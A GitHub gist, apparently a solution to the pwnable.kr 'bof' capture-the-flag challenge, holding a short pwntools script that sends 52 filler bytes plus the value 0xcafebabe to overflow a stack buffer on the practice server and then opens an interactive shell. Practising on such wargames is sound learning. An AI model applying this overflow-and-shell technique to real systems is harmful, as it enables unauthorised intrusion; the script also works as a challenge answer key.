from pwn import *
sh = remote('pwnable.kr', 9000)
sh.sendline('a'*52+'\xbe\xba\xfe\xca')
sh.interactive()
Last active
March 16, 2017 20:55
-
-
Save parksjin01/094b821f838febcd3cd9f715f140f669 to your computer and use it in GitHub Desktop.
pwnable.kr bof writeup
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment